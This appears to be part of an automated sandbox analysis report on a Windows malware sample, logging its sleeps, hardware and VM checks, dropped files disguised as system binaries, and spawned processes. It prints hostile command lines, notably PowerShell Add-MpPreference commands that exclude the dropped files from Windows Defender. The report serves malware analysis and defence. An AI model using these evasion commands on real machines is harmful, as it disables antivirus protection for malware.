                              Source: C:\Users\user\Desktop\s5duotgoYD.exe, Dropped PE file which has not been started: C:\Users\user\Desktop\XIsgiJJb.log
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe TID: 7440, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400, Thread sleep count: 2492 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512, Thread sleep count: 2177 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944, Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564, Thread sleep count: 2730 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768, Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408, Thread sleep count: 2627 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340, Thread sleep count: 2458 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592, Thread sleep count: 2519 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe TID: 8536, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe TID: 8776, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\ModemLogs\conhost.exe TID: 8768, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\ModemLogs\conhost.exe TID: 8544, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8920, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8492, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe TID: 8452, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe TID: 8772, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\xKVBpkhCEjg.exe TID: 8552, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\xKVBpkhCEjg.exe TID: 8548, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 5780, Thread sleep time: -30000s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592, Thread sleep time: -14757395258967632s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8260, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8680, Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe TID: 9176, Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\svchost.exe, File opened: PhysicalDrive0
                              Source: C:\Recovery\RuntimeBroker.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Recovery\RuntimeBroker.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Recovery\RuntimeBroker.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Recovery\RuntimeBroker.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Last function: Thread delayed
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe, File Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, File Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\ModemLogs\conhost.exe, File Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\RuntimeBroker.exe, File Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\xKVBpkhCEjg.exe, File Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\ModemLogs\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\ModemLogs\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\xKVBpkhCEjg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\xKVBpkhCEjg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File opened: C:\Users\user
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File opened: C:\Users\user\Documents\desktop.ini
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File opened: C:\Users\user\AppData\Local\Temp
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File opened: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File opened: C:\Users\user\AppData\Local
                              Source: s5duotgoYD.exe, 00000000.00000002.1843977314.000000001C2D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I
                              Source: w32tm.exe, 0000002E.00000002.1805940430.000002827BCA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                              Source: s5duotgoYD.exe, 00000000.00000002.1843977314.000000001C2E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                              Source: s5duotgoYD.exe, 00000000.00000002.1843977314.000000001C2D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef|
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Process information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Process token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe Process token adjusted: Debug
                              Source: C:\Windows\ModemLogs\conhost.exe Process token adjusted: Debug
                              Source: C:\Recovery\RuntimeBroker.exe Process token adjusted: Debug
                              Source: C:\Recovery\xKVBpkhCEjg.exe Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Memory allocated: page read and write | page guard

                              HIPS / PFW / Operating System Protection Evasion

                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\conhost.exe'
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\xKVBpkhCEjg.exe'
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe'
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xKVBpkhCEjg.exe'
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s5duotgoYD.exe'
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline"
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9C5.tmp" "c:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP"
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Queries volume information: C:\Users\user\Desktop\s5duotgoYD.exe VolumeInformation
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe Queries volume information: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\ModemLogs\conhost.exe Queries volume information: C:\Windows\ModemLogs\conhost.exe VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exe Queries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Queries volume information: C:\Users\user\Desktop\s5duotgoYD.exe VolumeInformation
                              Source: C:\Recovery\xKVBpkhCEjg.exe Queries volume information: C:\Recovery\xKVBpkhCEjg.exe VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
